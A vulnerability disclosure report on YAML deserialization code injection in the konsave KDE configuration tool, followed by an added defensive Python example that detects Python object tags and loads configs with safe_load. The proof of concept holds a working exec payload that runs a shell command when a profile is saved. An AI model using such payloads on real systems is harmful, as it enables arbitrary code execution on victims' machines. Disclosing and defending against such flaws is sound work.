Code Injection in prayag2/konsave
Valid
Reported on Mar 10th 2021
✍️ Description
konsave is a CLI program that lets you save and apply your KDE Plasma customizations with just one command. It is vulnerable to a YAML deserialization attack: unsafe loading of YAML leads to Arbitrary Code Execution.
🕵️♂️ Proof of Concept
Installation
pip install konsave
conf.yaml
payload = """cmd: !!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('xcalc')"
"""
Now copy conf.yaml and paste it into the konsave directory.
Run the command below:
konsave -s test
This will create a profile, and code execution will occur along with it.
💥 Impact
Arbitrary Code Execution
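A defensive check for the unsafe loading described above, as an added example that is not konsave's code or part of the original report: it lists `python/*` tags in a config by walking parser events (nothing is constructed) and loads with `yaml.safe_load`, which refuses those tags. It assumes PyYAML is installed; the function names and both sample documents are constructed for illustration.

```python
import yaml  # PyYAML (assumed installed)

YAML_NS = "tag:yaml.org,2002:"

# Constructed sample: same tags as the report's conf.yaml, with the command
# string replaced by a placeholder. Nothing in it is ever constructed or run.
SUSPICIOUS_CONF = """\
cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "placeholder"
"""

# Constructed benign config; this layout is hypothetical, not konsave's schema.
BENIGN_CONF = """\
save:
  - location: "$HOME/.config"
    entries: [plasmarc, kdeglobals]
"""


def python_tags(text):
    """List python/* tags by walking parser events; no objects are built."""
    found = []
    for event in yaml.parse(text, Loader=yaml.SafeLoader):
        tag = getattr(event, "tag", None)
        if tag and tag.startswith(YAML_NS + "python/"):
            found.append(tag[len(YAML_NS):])
    return found


def load_config(text):
    """Load with SafeLoader, which has no constructor for python/* tags."""
    try:
        return yaml.safe_load(text)
    except yaml.constructor.ConstructorError as exc:
        raise ValueError(f"rejected unsafe YAML: {exc.problem}") from exc


if __name__ == "__main__":
    print(python_tags(SUSPICIOUS_CONF))
    print(load_config(BENIGN_CONF))
    try:
        load_config(SUSPICIOUS_CONF)
    except ValueError as err:
        print(err)
```

`python_tags` can run as a pre-load audit over config files, while `load_config` is the loading path itself: plain mappings, lists and scalars load normally and any document carrying a Python object tag is rejected before an object is built.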